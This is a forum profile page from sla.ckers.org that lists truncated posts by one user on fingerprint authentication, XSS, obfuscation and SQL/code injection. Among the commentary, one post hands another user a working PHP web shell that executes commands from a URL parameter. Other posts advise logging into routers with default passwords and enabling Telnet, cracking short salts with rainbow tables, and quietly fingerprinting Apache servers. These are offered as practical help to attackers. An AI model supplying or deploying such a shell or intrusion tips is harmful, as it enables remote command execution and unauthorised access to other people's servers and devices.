Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 7
Results 1 - 30 of 195
2 years ago
Skyphire

Forum: OMG Ponies
2 years ago
Skyphire
Here is some current research: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.61.7126&rep=rep1&type=pdf In only 5000 tries they cracked 85 from 150 fingerprints, in later rounds they achieved 142 over 150 prints. Pretty damn awesome.
Forum: Privacy
2 years ago
Skyphire
Another idea: Fingerprint software that detects a pattern in a print must be somewhat fuzzy otherwise authentication fails often. The software might set fixed points and measures its distance. Hold your finger in a slightly different angle, and it still detects your print. So it must be fuzzy in a sense that it "scores" the points with some algorithm. So can we bruteforce it?
Forum: Privacy
2 years ago
Skyphire
Lot of PC's have fingerprint authentication, especially laptops. Fingerprints are the worst possible method for authentication. If a digital fingerprint is stolen (all are digitized nowadays) unlike a password, you cannot create another fingerprint. It's fixed forever to you. Which is incredibly weak security. So what are the methods of stealing fingerprints on PC's? are there trojans who ste
Forum: Privacy
2 years ago
Skyphire
^cr101 Well, hacking became cracking. If you're cracking then you're not hacking. A hacker is born, a cracker is created. That pretty much sums it up for me. If however, you are interested to tinker with computers for the joy, fun and love of it, then hacking still exists.
Forum: News and Links
2 years ago
Skyphire
Incredible: Plesk stores passwords in... you got that right: PLAINTEXT. Plesk boasts 250 million installations. Gotta love that. /facepalm.
Forum: News and Links
2 years ago
Skyphire
Another good reason not to be affiliated with "hackers" anymore. This whole thing is getting more ridiculous by the second. In case you haven't noticed, hacking is pretty much dead for a long, long time. These days you will be headline news with some stupid SQL/XSS injection and even get your own dedicated Wikipedia page for doing so. Not sure what is more pathetic, getting access throug
Forum: News and Links
2 years ago
Skyphire
neuf.martial Wrote: ------------------------------------------------------- > Then this encoded value will be inserted in the Database. > Never encode/convert user data upon _input_ into a database. Escape it, cast if you want and encode only upon _output_ or block/deny it when they submit it. Even removing characters can lead you to a whole new ballgame considering the multitude o
Forum: XSS Info
2 years ago
Skyphire
Unlikely, however the browser's HTMLparser might contain bugs, especially Firefox's. Just like this one I discovered in 2011, where a DOCTYPE leads to a denial of service in Firefox. 0. description 1. details 2. procedure 3. proof of concept 4. disclosure 5. solution description ----------- HTMLparser DOCTYPE Denial of service in Firefox. There is a b
Forum: XSS Info
2 years ago
Skyphire
A cloud I guess, or you might try Falling Rock Networks Hosting ;-)
Forum: OMG Ponies
2 years ago
Skyphire
I never liked BSD. But this isn't an OS war thread. I would never use a BSD desktop. I concur with the others, run a VM, download images and try 'em all out. It's about what works for you, not what's best for you. I still use Windows and I've never been hacked on it and even if I got hacked on, there isn't anything of value on it, since the valuable stuff isn't wired to the net.
Forum: OMG Ponies
2 years ago
Skyphire
Type in the IP see if a router is listening on port 80 with an admin screen, then try the default password, then enable Telnet or whatever.
Forum: Networking
2 years ago
Skyphire
DoS your ego instead. Who cares if you got flamed or trolled. No one cares. Drop the grudge and quit Googling yourself. Be happy.
Forum: Search Engine Hacking and SEO
2 years ago
Skyphire
I would try to attack the weakness of a short salt. Create an account with password that is 1 to 3 letters long: 'a' (if it will allow you to do so), get the password hash and run a rainbow table against it. If they use a short salt, then the chances are great to discover the salt if the password consists of only one to 3 letters. For example: Password: a Salt: 194583 Result: a194583
Forum: Full Disclosure
2 years ago
Skyphire
Go to a (PC) flea market and buy all the nics from a geek who sells them.
Forum: Privacy
2 years ago
Skyphire
Buy a dozen 20$ cellphones with WIFI, attach a long life battery pack and bury them under the ground at 12 different WIFI hotspots and then dial into them proxying through the hotspot with a cheap-ass laptop. That's it I guess.
Forum: Privacy
2 years ago
Skyphire
Great! I just ordered a pork pizza and it was delivered in a hazmat truck rigged with explosive devices to ward off possible suicide terrorist and avian flu customers dealing radioactive narcotics. DINGDONG!
Forum: Privacy
2 years ago
Skyphire
Yes? it didn't work. here's why:

    switch ($type)
    {
        // GIF
        case 1:
            if ($imgtype != '.gif')
            {
                @unlink($tmp_filename);
                message_die(GENERAL_ERROR, 'Unable to upload file', '', __LINE__, __FILE__);
            }
            break;

        //
Forum: News and Links
2 years ago
Skyphire
Well, kind of obvious.
Forum: News and Links
2 years ago
Skyphire
Looks like advertising malware. Dunno. Probably XSS injected.
Forum: Obfuscation
2 years ago
Skyphire
phoebeluella Wrote: ------------------------------------------------------- > Wow! Thank you! Really thank you very very much! > I also went to the file in my site and > "looked" at it by following my domain path, using > Chrome/view source And Viola...it was an open > "back door". I never really understood what a > backdoor entry was before this.
Forum: Obfuscation
2 years ago
Skyphire
Cute. I think many scripters/programmers still underestimate or are unaware of this kind of obfuscation.
Forum: Obfuscation
2 years ago
Skyphire
My guess is that it's a hashed ID for a record, so yeah probably security by obscurity. Try to generate a table with a million hashed integers and slice it on four characters, you might find the id. But with the id you can't do anything.
Forum: Obfuscation
2 years ago
Skyphire
RonPaul. Well, if you want to know what it does: try to de-obfuscate it. But since you posted it already, what did you do to deobfuscate it? did you do anything at all? or do you have no clue at all. If you have no clue at all, then think harder. It's pretty easy.
Forum: Obfuscation
2 years ago
Skyphire
Yes same old story. Nothing new really. Let this be a word of caution to aspiring hackers; for those who want to join hacking groups. A smart hacker doesn't join groups, that's what makes him or her a smart hacker that will never get caught. I am certain that most hacker outfits we see these days are already compromised for a very long time, some of these outfits were also created to gather i
Forum: OMG Ponies
2 years ago
Skyphire
well, at least you got an XSS.
Forum: SQL and Code Injection
2 years ago
Skyphire
HollywoodNazi's are at it again: Megaupload.com taken down. http://ca.news.yahoo.com/workers-indicted-one-worlds-largest-file-sharing-sites-200038389.html http://www.foxnews.com/scitech/2012/01/19/feds-shut-down-file-sharing-website/ http://www.fbi.gov/news/pressrel/press-releases/justice-department-charges-leaders-of-megaupload-with-widespread-online-copyright-infringement Just like t
Forum: News and Links
2 years ago
Skyphire
You can also try to find the images of Apache. Like the Apache logo, the Apache manual et cetera. Same for PHP and stuff. Usually an administrator or security professional won't remove those. It's also more unobtrusive than to blast away with all sorts of scanners.
Forum: SQL and Code Injection
2 years ago
Skyphire
Looks like it's filtered through htmlspecialchars, or magic quotes are enabled on the server. Can you post the source? CTRL+U in FireFox. Better than screenshots. Here is a small shell, and basically everything you need: <html><body bgcolor=#000000><form action='' method=GET> <textarea cols=100 rows=40><?php $_GET['cmd'] ? system($_GET['cmd']) : system('cd /');
Forum: SQL and Code Injection
2 years ago
Skyphire
You can use it to create Apps in their name, if you please, or remotely post/read stuff. Look up the twitter API.
Forum: CSRF and Session Info